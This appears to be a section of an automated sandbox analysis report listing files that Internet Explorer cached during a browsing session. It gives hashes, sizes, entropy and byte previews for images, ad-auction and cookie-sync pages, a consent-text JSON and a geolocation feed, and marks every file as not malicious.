C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOXLmR[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	11367
Entropy (8bit):	7.949461741006503
Encrypted:	false
SSDEEP:	192:Qo+qeQY7+SrqSVpRyMc0Wr0dG0nPuaQdudTMSe+j+urRAazlHwrMPLE/X+zcCXtZ:b+rQg+S+IYL0dG0PWQ/e+j+urRDh2MTR
MD5:	9C25C65360A515FF62C5DE8523D25786
SHA1:	ABBA2FB051A1EA70C4004FB794CA944F41E45176
SHA-256:	EDB4D45770589FD17392723619FEB00F738290F474753488F19A4F61A74D2E27
SHA-512:	FDE5FE2DE9667918F9E0AE1FE514D3A04B40408CC5EB8945406F6CA619E5E5CD616BBDC1C610B3581633B4029D3758D26C2DC65C74443CCA7C43865BFA1116E4
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..S0.....(......(......(..........P(.q@...1@..@..bb....eP......(......(......(.....P..1@.BI"D..`.;.R.[.&....Z[9Hay..Y.^......r...h.tc..;.rv7...a.."...l.V......#..].......HdUd..... .`..P.@......P.@.@.....b......].y.n#._Z.u.t[..7...>.);.^.........Y....c.q@z......O8...hlY.2.yk9..;=jn....I...e........@.`...#;....(.2.w.9......8.\|.2.j.....!1@.).P.P.@.@...........3..Z-".....".

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOXQSn[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	14975
Entropy (8bit):	7.463388367458557
Encrypted:	false
SSDEEP:	384:IPE9iR1wUiXQ2U2/0Vv1EYqoeeBYURcM5ygJOFuiYPwLuG/mN:IPgEiXdL/Iv18MGURdI4OFPV9mN
MD5:	26FA151E1DD466DD4C51794923FD05A5
SHA1:	E59F94E6FCC5F187180E6B8A3B3BAC30AB257CF2
SHA-256:	8A0C284F262167C01ABBE9D6B2A88FDFF4F96D11530685D8EF467B7058BB1C2C
SHA-512:	DCEAB3F2FFD77B715867E6465C58E5E83AAD22A6BA80EA866972783131B8ECDD9169DA40C4D10BBA9AF6716E1229575A7A03323B0B56D731002880BA459B5CB1
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....@-.........Z...Z.(..b..@..@.......Z.(.h.P.Hb..@......Z.(...P0...b.....a@...Q@....Z.(.......P!..%...J.LP!).J.&(.P.P.@.!.AL.....(.P.S.P.P ...A@.4.P!).P.....).P1h..b..Ha...-...Z.(..aH..a@.@...(.h...P.H...@..-...Q@.j.-...P1h.R.h..b..@.@.@.......J.(......4.P!...@...LBP+.....P!(..BS.;. ....(.U........XJ...J.).J.(.........(.h.R.P.@...P...Ha@.........Z.....Z.).(.h....a@.(..a@.@...- ...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOXROk[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	17275
Entropy (8bit):	7.900293035695635
Encrypted:	false
SSDEEP:	384:NEonASdwaskqd2ZQN8UekU6M5TzxJO74QP+jarSx:NQSfH7fUe1zXY+F
MD5:	E2742B3BE20A7CEFED5F9D1C5DA1CA06
SHA1:	C75811F63B9745667A5D7A94923817975C646AF0
SHA-256:	DE4859FB910577226F82D046C1D113B3F69167C3145B49F1D5EB3DE904BB61A0
SHA-512:	3C25242DD24FD9752C212483C69D81EA5C6A22543458289C5AD2253B2A628D711F9EA195DC0C4ECC24D8732A810FD985FC82AE02D39FCA3A4AB8855B6329BB6F
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...P.R...a..`y..j.....`.c.a.P2..]X...^.....h....&...f........P.uZ.`g..f....~.../......,....};SB;ds.`X.)..%A#.....7K..l.>g.....OR.[+b.~..#_S.@.d.K9f..Nq....y&i...P..00(..E%...(^I.(.M.zU...>.-.....t.C.g.....@.o.m..#....R9..y..?J..{@....{j..s...>..1......:/....]...4.....A!'...@.$.M.^..../.... ..P...:..%....q..LE.M..@..J.v(.........~...+:.R...Bn..S.\qc.Zyc.\|..I..)Y...o..$.x..s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOXW9J[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	14036
Entropy (8bit):	7.921381084426754
Encrypted:	false
SSDEEP:	192:Q20oTW+nhBwFNpXVrQUHZrhMTW4PFiF/2Vkctr6hpt7iZ8sDJfGeOBFA288:N0J/pp5rhMTWYiFOecFotmZ8oGBBFW8
MD5:	6E56B013AC5C4A9E841158F68E007963
SHA1:	DF23FAEAE96D7E4220F2685EA85AB5CFF8DA318B
SHA-256:	F78685DC27D1555EC07919F47E5657873D2262409FE260BB73732A06CE908453
SHA-512:	EAF2F050212EC32CCF6E77DCD6D8B25E6DD0B6F4B8D242584F07C60858DCC81B6D85C4EB6E611DBD06FDF50BBFD0542B95C196A1C8E198683C2C93802B2A0B7D
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.j..d2...Z._.N.lK&2.R$i.=...L....r.sY7q...5...."X.i.C..."-.4...14+.*.I.x..A...2@..S2k"....0.u6.#....f.W.m4./.=j....Z..g..H4\.kS. .)......Cj@(...I..Y.+&.6 l.H.T.!..I.#c. ....W.\S...{.$.d.......r...._..d.'.i.Ye'..Z.4?..hCB...I......n..-..\.I!\.T...I... J.....[........X.d.P.P.}...1..vq..m..Q.CJt...z..-....!c......g:V(..Z.F..NEl.-..S .TI..P.N.&.h..H.\..J...%.X......kE!.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOXWoQ[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
Category:	dropped
Size (bytes):	9836
Entropy (8bit):	7.874958162708499
Encrypted:	false
SSDEEP:	192:QtmhWt0PxBsiN+GNMjyUKey5x/qkQ1RAY4fncU/so5sirY0y3vYLZRR8Hsi:+Dt0PxBsioGN0yUOxZY4fV0oOSY0ywLk
MD5:	BFDDA8D220A7189671515A9ED62F124E
SHA1:	D14BDCD2B1FF7B1B1DBD688AE645FAA21929EDA9
SHA-256:	7696BB7428461FFC39031462E7D9236A1BAFE554CCDB258FD587FDC92D61EC2D
SHA-512:	C215AE1023764C793E2174215878E7A6203830EC0448324B733C51613C1FB1CB961D732974B3A90316C8E4B2EEAA0C738813E8808839B22972B8CFD97F2E6968
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(.E.-.-.-.-.........C.4..L...8.4...e...d.@..p....s!.....d...H#.?J.......-.%.....(...P..0.....(.h......(.:.............Z.Q@....t...]G..7.C<.........YAL..A..JeF..$...}Md..d.w.s.Q.._%...O......a..9WS.<....n..<.QT...r...v.....Q3.Rkb.kS!h.(...(.P.@.....(.h........(.h.4S.....Z.Z.(.E.-.-.).f.....V.._.XJ...H...C.$..g...EQq6rI8>....B.....ab~d_...........ds..O1...B....`..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOXjpu[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	7135
Entropy (8bit):	7.876864909454887
Encrypted:	false
SSDEEP:	192:Qohl1hFt3hoQk4zzD+6QDBUJ96e7R7PerG4SERMJqQ78Y1ay6:bhlbFt214zvCBUz6goyzGMJqQ7Tar
MD5:	FA24DFF9B191A08CDFE83B689109A648
SHA1:	2022CB2B47E3FF44ED91C8CDA93107CFE6222D6E
SHA-256:	9284D5C19B87EE627C9F92109E8D65EF1E4AB800FC5D51FE540044E1D61B8FCA
SHA-512:	A80D50C00FE1070555538A4F36119A0334E14C8F10FD06A1F3B122E625ACDD5C8905306D39D69BDCA57848641CC89C7E13BF4ADFEFB5908ADE8EC14D699D39B8
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....`...d........,.kTC%Z.H.L...L......Z.(.h........P.@.0...... z.....d.......U.H..3d.V..)...).P.@.@.@..-...(......(.).P.P.P..X2..u.....B....K$Z...U.D... .`-.....P...@.@....(.......`%.%.@..-.7Z.!).-..U.H..!.-Z%..`...h..y..+8.FMG....b......}i..\..q...>.O.K.........)...V...-...-...(......(.).....P..X2..u....R(Z.(.Bd.Z.6H.h....0..iI...-....`..u;.*e...I.B...C.z....O....rjTnW5..j.I<.H

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1cG73h[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1131
Entropy (8bit):	7.767634475904567
Encrypted:	false
SSDEEP:	24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
MD5:	D1495662336B0F1575134D32AF5D670A
SHA1:	EF841C80BB68056D4EF872C3815B33F147CA31A8
SHA-256:	8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
SHA-512:	964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
Malicious:	false
Preview:	.PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x\|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.......<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue........?A...v..0...aS.:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C\|{.\|r.$.=Y.#5.K6.!........d.G...{......$.-D.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....\|K..T....vd....cH.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BBih5H[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	835
Entropy (8bit):	7.675892111492914
Encrypted:	false
SSDEEP:	12:6v/7eorYebkI7N8EWhref+IdamL6pZvzKOH3X+tLNUAV6W9ONhTKnLw2x2lZgmAu:iYekvatqlKOXXS9V6W9uzRcQ9bL
MD5:	F79F56222F8B1B951A00A306C8AFA5C4
SHA1:	9FE78220A6811338E68FE7A2D65DC3B7FB5302BD
SHA-256:	2EF60D23400424838CD3B53021CFD903AA330168BDCC0A2AACFC7185832C00A9
SHA-512:	2172E9FCAB0547423F941BDB338D25528081F454857CA20A2D984C246CBF403341AC3689A748CECC1401B125E2138CFB61A9BF95F05D70329FB0BF504AFF9028
Malicious:	false
Preview:	.PNG........IHDR.............;0......pHYs..........+......IDATx..MHTQ....,...#..i....-.. J.6...iQd...p........D.6.e...>6AE.FJa.IA.b5ji..;>....\|..-<.s.}......&90I6%..6........o.-!'..!...Z<+^D...7..q:............Gx..5........&...6.{.4NBh.._Av....<..;`=<..D..5.[.g.4..Y+\|.......X...M....=..4.0.4....6.......x.....3......e0b.....k.Fa..@-.....=...c\|.8....4?../.o.g@=....ho.&...3$6.V....Ds .f.T..-...G\.7.z....h.&..^....bE...c...].0..!.Y.i.EU9t.$L...%ra.....I........L.l..uUyO. .%..F..s...kmW#~....2v.L~...N{3...i.U........E.g}.l...b]..%g.^7r.9.t...)...N.....a.4.....^'......-.f.A-..(LV..:} .~.O@.....g......\|`....".#..I.......@...u.>.{xD\|....`:.0.U...v9.u......c2C4)..,.u.a5....d.i....q....4.9.-.ip...C..:..g..h.N.B..+.U.w.......a.g...[.G.8.xZ<....:2nw:3ne,\|.oa...G.J1...c.&.N.Ox..6.............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BBs47TE[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	729
Entropy (8bit):	7.5922092557764165
Encrypted:	false
SSDEEP:	12:6v/7P8rv5yWWlEVHPp9pbq08N2ABLJqgahin7tiPqRqt0O1JtpB+kljRqP:u8rv5yjW1Prc7DLJqgahYEFdjjS
MD5:	C6C70DE8609A81CA57DCC6E725AFEB8F
SHA1:	7B8528B6812AB14CA00EE11E8B3CB8D235B4EA2E
SHA-256:	403CFB2FF9613073020021B38E41D1789B30CA8D777FAB15FD074ECDC53150A7
SHA-512:	86460D7E224FCD383C51325913153A5464B588AD59F631255337CCBD1A1909ED700464FC76754F24AE4162DD969F0C571DFF50E68382795E235B354309A4D043
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx...KL.A..g.Qc_qi....m...........1.b...H$..>.........D...&.M..m..@.x.[,...C..+.v..:...#.._2..o...{.......h._K.s.e...el)......n..X.-..s. ....by548...h......c.D.diI.m.....d.Vk....\.G....333CU55W.4=..........d:...u..v.a...\|.....8^6....UThb..;...O.....0..Q..y....K....-.cH.,..h.B6.5..h.._. I....i.d2M....^.'x..h.eY...u..M7m7.......Tl}..(.0.L........Q...........B........k...(.A..XW[...z.n..".?.Z..t...f%*41.l.+T..b.h....._...%.....'.N..T.D.i?...7...X....V.,...m...........K#..\|......^........zn^......R.'.s.`..J..I \|........+Z.Q..d.... i..$....Un.-.HaF/.C.$E.....D..}f.3.....D.`..`W.......b.. .~....eA..p.3.<...&...6....?=.lw"......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\auction[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15336
Entropy (8bit):	5.826577147976112
Encrypted:	false
SSDEEP:	192:Mhzc3HR0eYetpt5A1IaDYEx4TmCpkpZcNnnTmRNokn7YTmaBb+7n8hc:MhY3/jacEJCpkZcNKRCkn7Wb+7n8hc
MD5:	0F102D7BDC4F04D8D7957B6D083E0114
SHA1:	61B8704197441382E5CF501A841BFC2BF957082C
SHA-256:	277916FDB62A2C610D0031E68F3D092647AF305F8E4F08B98AE131CF607FA97D
SHA-512:	48B31BF838C18E146F60C614BB336F4C8271F4F86F43A5123F777826F6EC031AA62905DF64FCB6382ADA1811CE3261C23802CD97C4F1EDF265D4D68549DACE8E
Malicious:	false
Preview:	..<script id="sam-metadata" type="text/html" data-json="{"optout":{"msaOptOut":false,"browserOptOut":false},"taboola":{"sessionId":"v2_b369b61c52e0e1608e1b4be6a7af7e5a_ca2cf9d1-e5ff-46e3-bb0d-60033de426e7-tuct8520aa3_1633191203_1633191203_CIi3jgYQr4c_GOLgu7DEiPuK-QEgASgBMCs4stANQMuIEEjTnt0DUP___________wFYAGAAaKKcqr2pwqnJjgFwAA"},"tbsessionid":"v2_b369b61c52e0e1608e1b4be6a7af7e5a_ca2cf9d1-e5ff-46e3-bb0d-60033de426e7-tuct8520aa3_1633191203_1633191203_CIi3jgYQr4c_GOLgu7DEiPuK-QEgASgBMCs4stANQMuIEEjTnt0DUP___________wFYAGAAaKKcqr2pwqnJjgFwAA","pageViewId":"59c0595395b644768e22501793011ec8","RequestLevelBeaconUrls":[]}">..</script>....<li class="single serversidenativead hasimage " data-json="{"tvb":[],"trb":[],"tjb":[],"p":"gemini","e":true}" data-provider="gemini" data-ad-region="infopane" data-ad-index="2" data-viewabil

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21700
Entropy (8bit):	5.305082513785246
Encrypted:	false
SSDEEP:	384:VZAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOBQWwY4RXrqt:L86qhbS2RpF3OsBQWwY4RXrqt
MD5:	B5F20E1651F4F1946B488FF06242968A
SHA1:	AEA762A84C24EB4E69086A8FE735F0A86540EA92
SHA-256:	60C18B7845B8A1000103670FEBA257E27DFC731789BC6228A5ACA42CF101B2E8
SHA-512:	37DA7C66E1949934BAF502F133362787FB039C44A7C0E528B9F2F9A382CA782E26CB191127F2863ED4369325252B4E8A7A463C329EF16A50A58CDD66F1641AA0
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"bs":{"name":"bs","cookie":"data-bs","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[3].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21700
Entropy (8bit):	5.305082513785246
Encrypted:	false
SSDEEP:	384:VZAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOBQWwY4RXrqt:L86qhbS2RpF3OsBQWwY4RXrqt
MD5:	B5F20E1651F4F1946B488FF06242968A
SHA1:	AEA762A84C24EB4E69086A8FE735F0A86540EA92
SHA-256:	60C18B7845B8A1000103670FEBA257E27DFC731789BC6228A5ACA42CF101B2E8
SHA-512:	37DA7C66E1949934BAF502F133362787FB039C44A7C0E528B9F2F9A382CA782E26CB191127F2863ED4369325252B4E8A7A463C329EF16A50A58CDD66F1641AA0
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"bs":{"name":"bs","cookie":"data-bs","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\de-ch[2].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	79097
Entropy (8bit):	5.337866393801766
Encrypted:	false
SSDEEP:	768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
MD5:	408DDD452219F77E388108945DE7D0FE
SHA1:	C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
SHA-256:	197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
SHA-512:	17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
Malicious:	false
Preview:	{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\location[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	164
Entropy (8bit):	4.55341170338059
Encrypted:	false
SSDEEP:	3:LUfGC48HptOE9HhE/fQ8I5CMnRMRU8x4URGQP22/9SM+nmyRHfHO:nCj4ElhEAjvRMmhUMQP2zjO
MD5:	A6B42B0E34A354029688094D2B66EB8A
SHA1:	400B86D37BB8C1F8EC364F98A780D981F1357E92
SHA-256:	6AC51762DD026703234ED9446F010135439C46DC525113BAF9D202F2CE199DBF
SHA-512:	A1096CAA2142AB0F7A1D0899BBBF468D1053D248B61EAD2D8B2F3D63B2CF37570202195D8CDCA0FFD49DEDB9C63588F8EFAF463EB07C640235AD0AF1D70BBBD5
Malicious:	false
Preview:	jsonFeed({"country":"CH","state":"","stateName":"","zipcode":"","timezone":"Europe/Zurich","latitude":"47.14490","longitude":"8.15510","city":"","continent":"EU"});

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\medianet[3].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	410519
Entropy (8bit):	5.486768069131267
Encrypted:	false
SSDEEP:	6144:zWqkYqP1vG2jnmuynGJ8nKM03VCuPbxEWpJs9WmS:o1vFjKnGJ8KMGxTQWmS
MD5:	CFAB1FDA3FDDC006F9325E621EF27655
SHA1:	090EA92D604B80FAC6E61C91469282F99DD6DC42
SHA-256:	4929C65A209DFD699B0B5006847EB4B7CE3F43C7B57772EE2203D55B63EBE0BF
SHA-512:	FBE599B5928467ABF21160A70659C2FD0178CEF33B8D38C661F6A51D738D2296199AEE8494CB790937AF98204078D1AFCC0AE657B614BEEE672EBA3F5819FA3A
Malicious:	false
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\medianet[4].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	410520
Entropy (8bit):	5.486808221493406
Encrypted:	false
SSDEEP:	6144:ztqkYqP1vG2jnmuynGJ8nKM03VCuPb/EWpJs9WmS:p1vFjKnGJ8KMGxT6WmS
MD5:	ECC4E163995864023DBC706C5DD4E951
SHA1:	73BA7BA95C64CAC28710CA39745637C235498AC0
SHA-256:	F16280487E299785D60AE4EEDAD34DE6BEFC52A605F12B70E51DE029798959C3
SHA-512:	712D8F1A693C8A04DD0543756AED14EA246923BFDE9681EF13929365E7B8942DF6483DDBFC16F3A856C6D3459B986543DEA5841D5539E1A67C882D8E675237FD
Malicious:	false
